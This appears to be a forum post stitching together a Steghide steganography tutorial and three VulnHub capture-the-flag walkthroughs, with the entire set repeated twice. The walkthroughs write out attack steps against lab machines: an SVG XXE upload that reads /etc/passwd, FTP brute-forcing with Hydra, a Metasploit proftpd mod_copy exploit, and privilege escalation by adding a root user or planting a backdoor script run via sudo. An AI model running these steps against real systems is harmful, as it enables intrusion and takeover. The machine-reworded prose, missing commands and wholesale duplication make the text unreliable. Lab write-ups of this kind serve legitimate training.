Table of Content
In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program or convention. Media records are perfect for steganographic transmission since of their expansive estimate. For instance, a sender might begin with a harmless picture and make few alterations to it in order to hide data, so that, this alteration goes unnoticed for someone who is not particularly seeking out for it.
Introduction to Steghide
Steghide may be a steganography device which permits you to cover up confidential records inside a picture or sound record with a passphrase. Bolsters BMP and JPEG picture groups, AU and WAV sound groups. By default, its employments Rijndael calculation to scramble the record and the key measure is 128 bits. This tool has its advantages and disadvantages. One upside is that it is significantly better at covering up and can without much of a stretch shroud any document type. It does as such by utilizing a propelled calculation to shroud it inside the picture (or sound) record without changing the look (or sound) of the document. This additionally implies without utilizing steghide (or if nothing else a similar scientific methodology as steghide) it is hard to extricate the concealed documents from the picture.
Features
http://steghide.sourceforge.net/download.php. After downloading we have to simply unzip the files and use it through the cmd. In Linux, open your terminal and type the following command to download Steghide :
[size=small]apt-get install steghide
1
apt-get install steghide[/size]
Getting Started with Steghide
To start Steghide, the most basic option we use the help command. This command will display us all the options that Steghide provides us.
[size=small]steghide --help
1
steghide --help[/size]
[img=691x595]https://i0.wp.com/1.bp.blogspot.com...PL9tOG8ACLcBGAs/s1600/1.png?w=687&ssl=1[/img]
Embedding Data in The Image
[size=small]steghide embed -ef <txt filename> -cf <media filename>
1
steghide embed -ef <txt filename> -cf <media filename>[/size]
Here, ef and cf are termed as embedded file and cover file respectively.
[img=501x71]https://i2.wp.com/1.bp.blogspot.com...V4C_jh6ACLcBGAs/s1600/2.png?w=687&ssl=1[/img]
Extraction of Data Via Steghide
Using Steghide adds an extra layer of security by allowing us to use a password for it. Now, to extract the hidden data use the following command :
[size=small]steghide extract -sf <media filename>
1
steghide extract -sf <media filename>[/size]
Then enter the password in order to extract the file.
Here,
sf is a secret file
[img=400x54]https://i2.wp.com/1.bp.blogspot.com...bhuanqFgCLcBGAs/s1600/3.png?w=687&ssl=1[/img]
Password Protect Files
Now, we can also extract the files using the following command. This command is different is that it specifies a password in the command itself, therefore, we do not need to specify it separately.
Retrieve Information of Embedded File
If we have an image that is suspected to have data hidden and if so, then which algorithm is used to encrypt the data in the file. Then we will use the following command :
[size=small]steghide info <media filename>
1
steghide info <media filename>[/size]
[img=473x177]https://i1.wp.com/1.bp.blogspot.com...SxLOL3lwCLcBGAs/s1600/5.png?w=687&ssl=1[/img]
Verbose Mode
To get each and every information of a file during its extraction, we can use the verbose mode. The verbose mode gives you the detailed information. We can use the verbose mode by executing the following command :
Compression Mode
Now if we want to compress text file before hiding it then we would use the following command. The compression level can vary from 1 to 9. The first level gives you speed to compress whereas, at 9th level, it will provide you with the best compression techniques.
[size=small]steghide embed -ef <txt filename> -cf <media filename> -Z
1
steghide embed -ef <txt filename> -cf <media filename> -Z[/size]
Embedding File Without Name
We can also hide a file without naming it. We will use this command :
Encrypting Algorithms
We can encrypt the data that we are hiding by using encryption techniques. And this can be easily achieved by just using the following command :
[size=small]steghide embed -ef <txt filename> -cf <media filename> -e <algorithm name>
1
steghide embed -ef <txt filename> -cf <media filename> -e <algorithm name>[/size]
Overwriting the Existing File
Conclusion
here.
Security Level: Beginner
Penetrating Methodology:
Scanning:
[size=small]netdiscover
1
netdiscover[/size]
Then, as usual, we used our favourite tool Nmap for port enumeration. We found that port 22 and 3306 are open.
And we observed that on port 3306 http service was running.
[size=small]nmap -A 192.168.1.101
1
nmap -A 192.168.1.101[/size]
Enumeration:
We found nothing useful on the index page so we used dirb for brute-forcing and found one directory with .html extension.
[size=small]dirb http://192.168.1.101/3306 -X .html
1
dirb http://192.168.1.101/3306 -X .html[/size]
We tried to access the URL and found that it is an upload page and accepts only .svg files as input.
So we took help of the google to find any script in SVG format which we can utilize for xxe injection.
After doing some research we found on such script in which we are injecting /etc/passwd command. We copied the script and saved it as .svg file.
Exploitation:
We tried to upload the script file and it got successfully uploaded. And after uploading, we checked for the page source and got the output of /etc/passwd file.
We came to know that the target has multiple users like employee, chrony, nobody etc.
We thought of exploring other commands using the same script.
Since the target machine is using the /bin/ash shell, we thought of checking the shell history in the /.ash_history directory by editing the script file.
After editing we uploaded the file and got some useful information from the history file, which gave us a username and a password.
So we tried to ssh the target machine with username employee and a password superultrapass3 which we got above and were successfully able to login.
After logging in we checked for the suid permissions for privilege escalation and got one file with name micro which came out to be an editor tool.
[size=small]ssh [email protected]
find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro
1
2
3
ssh [email protected]
find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro[/size]
Privilege Escalation:
We tried to pipe the contents of /etc/passwd file into the macro editor where we can edit or add new users with root privileges
[size=small]cat /etc/passwd | /usr/bin/micro
1
cat /etc/passwd | /usr/bin/micro[/size]
We created the password for the new user using the openssl tool.
[size=small]openssl passwd -1 -salt user3 pass123
1
openssl passwd -1 -salt user3 pass123[/size]
After that, we added the new user test and hashed password with root privileges into the /etc/passwd file and saved it.
Once we had a user with root privileges we switched to that user and successfully got the shell with root shell and eventually got the flag.
[size=small]su test
id
cd /root
cat flag.txt
1
2
3
4
su test
id
cd /root
cat flag.txt[/size]
PumpkinFestival is another CTF challenge from the series of Mission-Pumpkin v1.0 created by keeping beginners in mind and all credit for this VM goes to Jayanth. This level is all about collecting 10 pumpkin tokens gain the root access to collect the PumpkinFestival_Ticket.
You can download it from HERE
Level: Beginner to Intermediate
Penetrating Methodology:
Scanning:
Then, as usual, we used our favourite tool Nmap for port scanning. We found that port 21, 80 is open and ssh is running on port 6880.
[size=small]nmap -p- -A 192.168.1.101
1
nmap -p- -A 192.168.1.101[/size]
Token 1:
Anonymous login is enabled on the ftp. So we tried to login using anonymous: anonymous.
Upon successful login we traversed through different directories and found our first token 2d6dbbae84d724409606eddd9dd71265 inside token.txt file.
[size=small]ftp 192.168.1.101
cd secret
get token.txt
bye
cat token.txt
1
2
3
4
5
ftp 192.168.1.101
cd secret
get token.txt
bye
cat token.txt[/size]
Token 2:
Alohomera! Which might be useful later on.
We checked for the page source of the page and got our second token 45d9ee7239bc6b0bb21d3f8e1c5faa52.
In the page source only we also found one username Harry which we will use in the later stage.
Token 3:
In the nmap scan earlier we have got few directories, we tried to access each one of them one by one.
From the /store/track.txt we found one username admin and a domain name pumpkin.local.
After that, we accessed the pumpkin.local from the browser it came out to be another WordPress site and got one more flag 06c3eb12ef2389e2752335beccfb2080.
Token 4:
There is one more directory which we got from the Nmap scan named /tokens.
2c0e11d2200e2604587c331f02a7ebea in token.txt.
Token 5:
Since we have a WordPress site running under pumpkins.local domain name, we tried wpscan and got a file named readme.html.
[size=small]wpscan --url http://pumpkins.local -e at -e ap -e u
1
wpscan --url http://pumpkins.local -e at -e ap -e u[/size]
We also got two usernames admin & morse for the WordPress site which we will use to access the admin login of the site later on.
After accessing the URL pumpkins.local/readme.html we got some code.
We tried to crack it online and it was a base62 code which gave us a password Ug0t!TrIpyJ for user morse & jack.
As we have got the password for the morse, we logged in to the wp-admin and got our 5th token 7139e925fd43618653e51f820bc6201b
Token 6:
Since we have one more wp-admin user named admin and if you remember we also have got a keyword earlier named Alohomera! we tried this as our password to login into a WordPress site and were successfully able to do so and eventually got our 6th token f2e00edc353309b40e1aed18e18ab2c4
Token 7:
We used DirBuster to bruteforce the URL http://pumpkin.local and got one more directory named license.txt Accessing the same directory in the browser gave us one more token 5ff346114d634a015ce413e1bc3d8d71
Accessing the same directory in the browser gave us one more token 5ff346114d634a015ce413e1bc3d8d71
Token 8:
We have a total of four users admin, morse, jack & harry with passwords only for only three.
So we tried to get the password of harry by bruteforcing using hydra. We got a password yrrah.
[size=small]hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr
1
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr[/size]
We logged into ftp of the target machine using these credentials and found the 8th token ba9fa9abf2be9373b7cbd9a6457f374e
[size=small]ftp 192.168.1.101
ls
get token.txt
bye
cat token.txt
1
2
3
4
5
ftp 192.168.1.101
ls
get token.txt
bye
cat token.txt[/size]
Token 9:
In the above screenshot you can see that there is a directory named /Donotopen , we went inside this directory and found another directory named /NO and after a lot of traversing we finally found the file name token.txt. We downloaded the file into our system and got the 9th token 8d66ef0055b43d80c34917ec6c75f706
[size=small]cd Donotopen
ls
cd NO
cd NOO
cd NOOO
cd NOOOO
get token.txt
bye
cat token.txt
1
2
3
4
5
6
7
8
9
cd Donotopen
ls
cd NO
cd NOO
cd NOOO
cd NOOOO
get token.txt
bye
cat token.txt[/size]
Token 10:
From the above screen you might have seen there is one more directory /NOOOOO and after some traversing found a file data.txt. We downloaded the file into our kali and found some random codes inside.
[size=small]cd NOOOOOO
bye
get data.txt
1
2
3
cd NOOOOOO
bye
get data.txt[/size]
We checked for the file type and it is tar file. We untar the file and got another file data.
That file also came out to be a zip file and after unzipping we got a file key and after untaring that, we finally got a file named jack which had hexdump inside.
[size=small]file data.txt
tar vxf data.txt
tar xjf data
tar vxf key
cat jack
1
2
3
4
5
file data.txt
tar vxf data.txt
tar xjf data
tar vxf key
cat jack[/size]
Then we used xxd to covert and patch the hexdump into binary.
We got an ssh private key.
[size=small]xxd -r -p jack
1
xxd -r -p jack[/size]
As we have got an ssh key, what we did is we used this key to ssh login the target machine on port 6808 with user jack.
8d66ef0055b43d80c34917ec6c75f706
[size=small]chmod 600 sshkey
ssh [email protected] -i sshkey -p 6880
file token
./token
sudo -l
1
2
3
4
5
chmod 600 sshkey
ssh [email protected] -i sshkey -p 6880
file token
./token
sudo -l[/size]
Privilege Escalation/PumpkinFestival_Ticket:
From the above screenshot, we can see jack has sudoer permission for alohomora file.
Now to get the root shell and then finally get the PumpkinFestival_Ticket we will exploit the sudoer permissions of the jack.
alohomora with /bin/bash copied in it.
We then gave it execution permissions and tried to execute the file as sudoer and we successfully got the root shell and eventually the PumpkinFestival_Ticket which completes our challenge.
[size=small]mkdir pumpkins
echo "/bin/sh" > /home/jack/pumpkins/alohomora
chmod 777 /home/jack/pumkins/alohomora
id
cd /root
ls
cat PumpkinFestival_Ticket
1
2
3
4
5
6
7
mkdir pumpkins
echo "/bin/sh" > /home/jack/pumpkins/alohomora
chmod 777 /home/jack/pumkins/alohomora
id
cd /root
ls
cat PumpkinFestival_Ticket[/size]
Download Link: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
Level: Intermediate
Task: Obtain root shell
Scanning
Scanning
Then, as usual, we used our favourite tool Nmap for port scanning. Here we found that so many ports were opened but port 21 for ftp looks more interesting to me as anonymous login was allowed on the running machine for two directories /upload /download.
[size=small]nmap -A 192.168.1.104
1
nmap -A 192.168.1.104[/size]
Enumeration
[size=small]ftp 192.168.1.104
ls
cd download
ls
get directory
1
2
3
4
5
ftp 192.168.1.104
ls
cd download
ls
get directory[/size]
Thus, we copied the file named as directories in our local machine.
[size=small]telnet 192.168.1.104 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control
1
2
3
telnet 192.168.1.104 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control[/size]
Further, we navigate to /upload/version_control and found a version of ftp service running on host machine moreover we obtained the path for webroot i.e. /var/www/tryingharderisjoy.
Exploit
So, we search for an exploit for proftpd and found a Metasploit module thus we execute the following command to get a session of the host machine.
[size=small]use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104
msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit
1
2
3
4
use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104
msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit[/size]
We successfully obtained the command shell of the remote machine, now it was time for post enumeration to step towards privilege escalation. Thus, we import python one-liner to access proper tty shell and start with directory traversing.
It feels good when we dig-out credential of Patrick from inside the /ossec/patricsecretofjoy.
credentials for JOY:
[size=small]patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
1
2
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis[/size]
Privilege Escalation
So we decided to replace /test script with other malicious script but there was no writable permission on /script directory.
Thus, again we decided to use FTP anonymous login for replacing genuine /test file with bogus /test file which will be a backdoor to provide higher privilege shell.
[size=small]echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
1
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test[/size]
[size=small]telnet 192.168.1.104 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
1
2
3
telnet 192.168.1.104 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test[/size]
[size=small]sudo /home/patrick/script/test
1
sudo /home/patrick/script/test
cd /root
cat proof.txt
author-secret.txt
1
2
3
cd /root
cat proof.txt
author-secret.txt[/size]
- Introduction to Steganography
- Introduction to Steghide
- Features
- Installation of Steghide
- Getting Start with Steghide
- Functionality of Steghide
- Embedding of Data Via Steghide
- Extraction of Data Via Steghide
- Password Protect Files
- Retrieve Information of Embedded File
- Verbose Mode
- Compression Mode
- Anti-compression Mode
- Embedding File Without Name
- Encrypting Algorithms
- Overwriting the Existing File
In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program or convention. Media records are perfect for steganographic transmission since of their expansive estimate. For instance, a sender might begin with a harmless picture and make few alterations to it in order to hide data, so that, this alteration goes unnoticed for someone who is not particularly seeking out for it.
Introduction to Steghide
Steghide may be a steganography device which permits you to cover up confidential records inside a picture or sound record with a passphrase. Bolsters BMP and JPEG picture groups, AU and WAV sound groups. By default, its employments Rijndael calculation to scramble the record and the key measure is 128 bits. This tool has its advantages and disadvantages. One upside is that it is significantly better at covering up and can without much of a stretch shroud any document type. It does as such by utilizing a propelled calculation to shroud it inside the picture (or sound) record without changing the look (or sound) of the document. This additionally implies without utilizing steghide (or if nothing else a similar scientific methodology as steghide) it is hard to extricate the concealed documents from the picture.
Features
- Compression of embedded data
- BMP, GIF and JPG supported
- Encryption of embedded data
- Decryption via password
- Uses various algorithms for encryption
http://steghide.sourceforge.net/download.php. After downloading we have to simply unzip the files and use it through the cmd. In Linux, open your terminal and type the following command to download Steghide :
[size=small]apt-get install steghide
1
apt-get install steghide[/size]
Getting Started with Steghide
To start Steghide, the most basic option we use the help command. This command will display us all the options that Steghide provides us.
[size=small]steghide --help
1
steghide --help[/size]
[img=691x595]https://i0.wp.com/1.bp.blogspot.com...PL9tOG8ACLcBGAs/s1600/1.png?w=687&ssl=1[/img]
Embedding Data in The Image
[size=small]steghide embed -ef <txt filename> -cf <media filename>
1
steghide embed -ef <txt filename> -cf <media filename>[/size]
Here, ef and cf are termed as embedded file and cover file respectively.
[img=501x71]https://i2.wp.com/1.bp.blogspot.com...V4C_jh6ACLcBGAs/s1600/2.png?w=687&ssl=1[/img]
Extraction of Data Via Steghide
Using Steghide adds an extra layer of security by allowing us to use a password for it. Now, to extract the hidden data use the following command :
[size=small]steghide extract -sf <media filename>
1
steghide extract -sf <media filename>[/size]
Then enter the password in order to extract the file.
Here,
sf is a secret file
[img=400x54]https://i2.wp.com/1.bp.blogspot.com...bhuanqFgCLcBGAs/s1600/3.png?w=687&ssl=1[/img]
Password Protect Files
Now, we can also extract the files using the following command. This command is different is that it specifies a password in the command itself, therefore, we do not need to specify it separately.
Retrieve Information of Embedded File
If we have an image that is suspected to have data hidden and if so, then which algorithm is used to encrypt the data in the file. Then we will use the following command :
[size=small]steghide info <media filename>
1
steghide info <media filename>[/size]
[img=473x177]https://i1.wp.com/1.bp.blogspot.com...SxLOL3lwCLcBGAs/s1600/5.png?w=687&ssl=1[/img]
Verbose Mode
To get each and every information of a file during its extraction, we can use the verbose mode. The verbose mode gives you the detailed information. We can use the verbose mode by executing the following command :
Compression Mode
Now if we want to compress text file before hiding it then we would use the following command. The compression level can vary from 1 to 9. The first level gives you speed to compress whereas, at 9th level, it will provide you with the best compression techniques.
[size=small]steghide embed -ef <txt filename> -cf <media filename> -Z
1
steghide embed -ef <txt filename> -cf <media filename> -Z[/size]
Embedding File Without Name
We can also hide a file without naming it. We will use this command :
Encrypting Algorithms
We can encrypt the data that we are hiding by using encryption techniques. And this can be easily achieved by just using the following command :
[size=small]steghide embed -ef <txt filename> -cf <media filename> -e <algorithm name>
1
steghide embed -ef <txt filename> -cf <media filename> -e <algorithm name>[/size]
Overwriting the Existing File
Conclusion
here.
Security Level: Beginner
Penetrating Methodology:
- Scanning
- Netdiscover
- NMAP
- Enumeration
- Web Directory Search
- Exploitation
- Command Injection
- SSH
- Privilege Escalation
- Exploiting Suid rights
Scanning:
[size=small]netdiscover
1
netdiscover[/size]
Then, as usual, we used our favourite tool Nmap for port enumeration. We found that port 22 and 3306 are open.
And we observed that on port 3306 http service was running.
[size=small]nmap -A 192.168.1.101
1
nmap -A 192.168.1.101[/size]
Enumeration:
We found nothing useful on the index page so we used dirb for brute-forcing and found one directory with .html extension.
[size=small]dirb http://192.168.1.101/3306 -X .html
1
dirb http://192.168.1.101/3306 -X .html[/size]
We tried to access the URL and found that it is an upload page and accepts only .svg files as input.
So we took help of the google to find any script in SVG format which we can utilize for xxe injection.
After doing some research we found on such script in which we are injecting /etc/passwd command. We copied the script and saved it as .svg file.
Exploitation:
We tried to upload the script file and it got successfully uploaded. And after uploading, we checked for the page source and got the output of /etc/passwd file.
We came to know that the target has multiple users like employee, chrony, nobody etc.
We thought of exploring other commands using the same script.
Since the target machine is using the /bin/ash shell, we thought of checking the shell history in the /.ash_history directory by editing the script file.
After editing we uploaded the file and got some useful information from the history file, which gave us a username and a password.
So we tried to ssh the target machine with username employee and a password superultrapass3 which we got above and were successfully able to login.
After logging in we checked for the suid permissions for privilege escalation and got one file with name micro which came out to be an editor tool.
[size=small]ssh [email protected]
find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro
1
2
3
ssh [email protected]
find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro[/size]
Privilege Escalation:
We tried to pipe the contents of /etc/passwd file into the macro editor where we can edit or add new users with root privileges
[size=small]cat /etc/passwd | /usr/bin/micro
1
cat /etc/passwd | /usr/bin/micro[/size]
We created the password for the new user using the openssl tool.
[size=small]openssl passwd -1 -salt user3 pass123
1
openssl passwd -1 -salt user3 pass123[/size]
After that, we added the new user test and hashed password with root privileges into the /etc/passwd file and saved it.
Once we had a user with root privileges we switched to that user and successfully got the shell with root shell and eventually got the flag.
[size=small]su test
id
cd /root
cat flag.txt
1
2
3
4
su test
id
cd /root
cat flag.txt[/size]
PumpkinFestival is another CTF challenge from the series of Mission-Pumpkin v1.0 created by keeping beginners in mind and all credit for this VM goes to Jayanth. This level is all about collecting 10 pumpkin tokens gain the root access to collect the PumpkinFestival_Ticket.
You can download it from HERE
Level: Beginner to Intermediate
Penetrating Methodology:
- Scanning
- Nmap
- Enumeration
- FTP
- WPScan
- DirBuster
- Enum4linux
- Hydra
- Exploitation
- SSH
- Privilege Escalation
- Exploiting Sudo rights
Scanning:
Then, as usual, we used our favourite tool Nmap for port scanning. We found that port 21, 80 is open and ssh is running on port 6880.
[size=small]nmap -p- -A 192.168.1.101
1
nmap -p- -A 192.168.1.101[/size]
Token 1:
Anonymous login is enabled on the ftp. So we tried to login using anonymous: anonymous.
Upon successful login we traversed through different directories and found our first token 2d6dbbae84d724409606eddd9dd71265 inside token.txt file.
[size=small]ftp 192.168.1.101
cd secret
get token.txt
bye
cat token.txt
1
2
3
4
5
ftp 192.168.1.101
cd secret
get token.txt
bye
cat token.txt[/size]
Token 2:
Alohomera! Which might be useful later on.
We checked for the page source of the page and got our second token 45d9ee7239bc6b0bb21d3f8e1c5faa52.
In the page source only we also found one username Harry which we will use in the later stage.
Token 3:
In the nmap scan earlier we have got few directories, we tried to access each one of them one by one.
From the /store/track.txt we found one username admin and a domain name pumpkin.local.
After that, we accessed the pumpkin.local from the browser it came out to be another WordPress site and got one more flag 06c3eb12ef2389e2752335beccfb2080.
Token 4:
There is one more directory which we got from the Nmap scan named /tokens.
2c0e11d2200e2604587c331f02a7ebea in token.txt.
Token 5:
Since we have a WordPress site running under pumpkins.local domain name, we tried wpscan and got a file named readme.html.
[size=small]wpscan --url http://pumpkins.local -e at -e ap -e u
1
wpscan --url http://pumpkins.local -e at -e ap -e u[/size]
We also got two usernames admin & morse for the WordPress site which we will use to access the admin login of the site later on.
After accessing the URL pumpkins.local/readme.html we got some code.
We tried to crack it online and it was a base62 code which gave us a password Ug0t!TrIpyJ for user morse & jack.
As we have got the password for the morse, we logged in to the wp-admin and got our 5th token 7139e925fd43618653e51f820bc6201b
Token 6:
Since we have one more wp-admin user named admin and if you remember we also have got a keyword earlier named Alohomera! we tried this as our password to login into a WordPress site and were successfully able to do so and eventually got our 6th token f2e00edc353309b40e1aed18e18ab2c4
Token 7:
We used DirBuster to bruteforce the URL http://pumpkin.local and got one more directory named license.txt Accessing the same directory in the browser gave us one more token 5ff346114d634a015ce413e1bc3d8d71
Accessing the same directory in the browser gave us one more token 5ff346114d634a015ce413e1bc3d8d71
Token 8:
We have a total of four users admin, morse, jack & harry with passwords only for only three.
So we tried to get the password of harry by bruteforcing using hydra. We got a password yrrah.
[size=small]hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr
1
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.101 ftp -e nsr[/size]
We logged into ftp of the target machine using these credentials and found the 8th token ba9fa9abf2be9373b7cbd9a6457f374e
[size=small]ftp 192.168.1.101
ls
get token.txt
bye
cat token.txt
1
2
3
4
5
ftp 192.168.1.101
ls
get token.txt
bye
cat token.txt[/size]
Token 9:
In the above screenshot you can see that there is a directory named /Donotopen , we went inside this directory and found another directory named /NO and after a lot of traversing we finally found the file name token.txt. We downloaded the file into our system and got the 9th token 8d66ef0055b43d80c34917ec6c75f706
[size=small]cd Donotopen
ls
cd NO
cd NOO
cd NOOO
cd NOOOO
get token.txt
bye
cat token.txt
1
2
3
4
5
6
7
8
9
cd Donotopen
ls
cd NO
cd NOO
cd NOOO
cd NOOOO
get token.txt
bye
cat token.txt[/size]
Token 10:
From the above screen you might have seen there is one more directory /NOOOOO and after some traversing found a file data.txt. We downloaded the file into our kali and found some random codes inside.
[size=small]cd NOOOOOO
bye
get data.txt
1
2
3
cd NOOOOOO
bye
get data.txt[/size]
We checked for the file type and it is tar file. We untar the file and got another file data.
That file also came out to be a zip file and after unzipping we got a file key and after untaring that, we finally got a file named jack which had hexdump inside.
[size=small]file data.txt
tar vxf data.txt
tar xjf data
tar vxf key
cat jack
1
2
3
4
5
file data.txt
tar vxf data.txt
tar xjf data
tar vxf key
cat jack[/size]
Then we used xxd to covert and patch the hexdump into binary.
We got an ssh private key.
[size=small]xxd -r -p jack
1
xxd -r -p jack[/size]
As we have got an ssh key, what we did is we used this key to ssh login the target machine on port 6808 with user jack.
8d66ef0055b43d80c34917ec6c75f706
[size=small]chmod 600 sshkey
ssh [email protected] -i sshkey -p 6880
file token
./token
sudo -l
1
2
3
4
5
chmod 600 sshkey
ssh [email protected] -i sshkey -p 6880
file token
./token
sudo -l[/size]
Privilege Escalation/PumpkinFestival_Ticket:
From the above screenshot, we can see jack has sudoer permission for alohomora file.
Now to get the root shell and then finally get the PumpkinFestival_Ticket we will exploit the sudoer permissions of the jack.
alohomora with /bin/bash copied in it.
We then gave it execution permissions and tried to execute the file as sudoer and we successfully got the root shell and eventually the PumpkinFestival_Ticket which completes our challenge.
[size=small]mkdir pumpkins
echo "/bin/sh" > /home/jack/pumpkins/alohomora
chmod 777 /home/jack/pumkins/alohomora
id
cd /root
ls
cat PumpkinFestival_Ticket
1
2
3
4
5
6
7
mkdir pumpkins
echo "/bin/sh" > /home/jack/pumpkins/alohomora
chmod 777 /home/jack/pumkins/alohomora
id
cd /root
ls
cat PumpkinFestival_Ticket[/size]
Download Link: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
Level: Intermediate
Task: Obtain root shell
Scanning
- Nmap
- FTP anonymous login
- Exploit proftpd using Metasploit
- Sudo right
Scanning
Then, as usual, we used our favourite tool Nmap for port scanning. Here we found that so many ports were opened but port 21 for ftp looks more interesting to me as anonymous login was allowed on the running machine for two directories /upload /download.
[size=small]nmap -A 192.168.1.104
1
nmap -A 192.168.1.104[/size]
Enumeration
[size=small]ftp 192.168.1.104
ls
cd download
ls
get directory
1
2
3
4
5
ftp 192.168.1.104
ls
cd download
ls
get directory[/size]
Thus, we copied the file named as directories in our local machine.
[size=small]telnet 192.168.1.104 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control
1
2
3
telnet 192.168.1.104 21
site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control[/size]
Further, we navigate to /upload/version_control and found a version of ftp service running on host machine moreover we obtained the path for webroot i.e. /var/www/tryingharderisjoy.
Exploit
So, we search for an exploit for proftpd and found a Metasploit module thus we execute the following command to get a session of the host machine.
[size=small]use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104
msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit
1
2
3
4
use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.1.104
msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/tryingharderisjoy
msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit[/size]
We successfully obtained the command shell of the remote machine, now it was time for post enumeration to step towards privilege escalation. Thus, we import python one-liner to access proper tty shell and start with directory traversing.
It feels good when we dig-out credential of Patrick from inside the /ossec/patricsecretofjoy.
credentials for JOY:
[size=small]patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
1
2
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis[/size]
Privilege Escalation
So we decided to replace /test script with other malicious script but there was no writable permission on /script directory.
Thus, again we decided to use FTP anonymous login for replacing genuine /test file with bogus /test file which will be a backdoor to provide higher privilege shell.
[size=small]echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test
1
echo "awk 'BEGIN {system(\"/bin/bash\")}'" > test[/size]
[size=small]telnet 192.168.1.104 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test
1
2
3
telnet 192.168.1.104 21
site cpfr /home/ftp/upload/test
site cpto /home/patrick/script/test[/size]
[size=small]sudo /home/patrick/script/test
1
sudo /home/patrick/script/test
cd /root
cat proof.txt
author-secret.txt
1
2
3
cd /root
cat proof.txt
author-secret.txt[/size]